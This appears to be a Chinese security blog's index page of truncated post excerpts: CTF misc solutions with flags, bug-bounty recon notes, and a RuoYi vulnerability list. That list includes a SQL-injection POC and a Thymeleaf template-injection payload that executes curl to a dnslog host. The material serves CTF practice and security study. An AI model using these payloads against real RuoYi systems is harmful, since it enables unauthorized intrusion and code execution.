对于无法直接发布或者较敏感的文章,将使用密码保护机制。YWRtaW4xMjM=
最近在更新下面的文章
https://hihopkc.github.io/categories/网络安全/渗透测试/
ZmxhZ3t5b3U=
唉 你可以找到flag吗
千万别点下面的按钮
秘密
are
不要点啦!
都叫你别点了!! 再点就过分啦!!! smart}
hihopkc
画师
flag为有意义单词flag{[a-zA-Z_]}
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219 ...
Misc猜一猜
题目描述:
你们想要的flag就在压缩包里面。
压缩包文件名 解密
解压密码为a1478520
然后修改flag.png文件头
得到
扫描二维码之后
1❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=
花朵解密
https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo
得到flag
1flag{rUsJyNdKhdKuS4VfO7}
要的就在这
题目描述:
你要的在这里
用010editor打开
上面那个是定积分,解出来是π
然后6是什么呢,猜测是3.1415
然后用stegpy解密
123>python steg.py misc.png -pEnter password (will not be echoed):3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733dk:luckyone
1234535 ...
https://www.bilibili.com/read/cv25416412/
参考这篇文章
我也出现这种情况
windows电脑在C:\Windows\System32\drivers\etc
找到hosts文件添加下面这行
158.215.175.53 dav.jianguoyun.com
tips:需要用管理员编辑
后面可以不用挂代理去同步了
MISC复合尝试导出http数据
发现文件类型和文件名都被改过
把pass.md改为pass.zip,发现打不开
添加文件头
解压得到
123456789101112131415161718192021222324252627282930313233Emklyusg=E2=80=82gni=E2=80=82bvvymlag=E2=80=82tsqic=E2=80=82colz=E2=80=82jx=moxvl=E2=80=82tiwhz=E2=80=82ebmee,=E2=80=82Zhjeoig=E2=80=82Krpvpi-Zgvlyvx==E2=80=82Evdr=E2=80=82or=E2=80=82olv=E2=80=82Rbtm=E2=80=82bl=E2=80=82Gcscck=h=E2=80=82une=E2=80=82fz=E2=80=82e=E2=80=82tftstrtkdrx=E2=80=82rxeb=E2=80==82suv=E2=80=82olfqx=E2=80=82dpb=E2=80=82tizh=E2=80=82km=E2=80=82kliq=E2= ...
MISCgame谷歌搜图
发现这个
https://steamcommunity.com/sharedfiles/filedetails/?l=hungarian&id=601631716
然后点击
XYCTF{Papers, Please}
我的二维码为啥扫不出来?
怎么回事,我的二维码好像出了什么问题,你可以帮我修复一下吗
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647from PIL import Imageimport randomdef reverse_color(x): return 0 if x == 255 else 255def reverse_row_colors(pixels, row, width, block_size=10): for x_block in range(width // block_size): x = x_block * block_size y = row * ...
信息收集
找准SRC,就是淦。企业SRC千千万,就是淦!
工具
SRC信息收集
小程序信息收集
子域名信息收集
子公司信息收集
ICP备案
ICON 信息收集
项目信息收集
IP信息收集
SRC信息收集SRC大全http://www.aquanbang.com/favorites/企业src/https://mp.weixin.qq.com/s/eau4-C8MFrbTN4z_Sm5AoAhttps://mp.weixin.qq.com/s/a5jh08vFG6BZzxIvYigmMwhttps://www.anquanke.com/post/id/84608
选择SRC大型企业SRC举例:
https://sfsrc.sf-express.com/notice/SFSA23-58/1695546355530
优点资产丰厚,核心业务,一般业务,边缘业务
业内认可度高,大型SRC
钱多,审核标准固定
缺点难度大,特别是主站,工程师代码优秀
中小型企业SRC优点难度适宜 挖的人并不多
缺点资产较少
评判标准不一(某些洞 前期是认的 但是到了后面感觉)
审核较慢
公益SRC360公 ...
数据分析packet
题目内容:
wireshark在手,简单的数据包分析就是小case。
查看tcp流19
一段base64,解码后得到
flag{7d6f17a4-2b0a-467d-8a42-66750368c249}
缺失的数据
题目内容:随着数字技术的迅猛发展,图像在网络上的传播日益广泛。然而,这也带来了版权保护、信息认证和内容完整性验证等一系列问题。数字水印技术作为一种有效的信息隐藏和认证手段,请分析出图片中隐藏的信息。
orign.zip里面有个srcret.txt,这个是个字典
用arch爆破一下
密码为pavilion
解压出来
得到原先文件a.png
原先有个lose.py
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677 class WaterMarkDWT: def __init__(self, origin ...
若依框架页面展示
若依系统前后台漏洞大全
Shiro反序列化
SQL注入(需要登录)漏洞点为系统管理中的角色管理的搜索功能,发现注入点参数为:params[dataScope]
1234POC:pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=andextractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))
Thymeleaf模板注入(需要登录)给payload编码一下,选URL编码:
1${T (java.lang.Runtime).getRuntime().exec("curl xxxx.dnslog.cn")}
登录系统,需要添加cookie访问
1http://192.168.0.2/ ...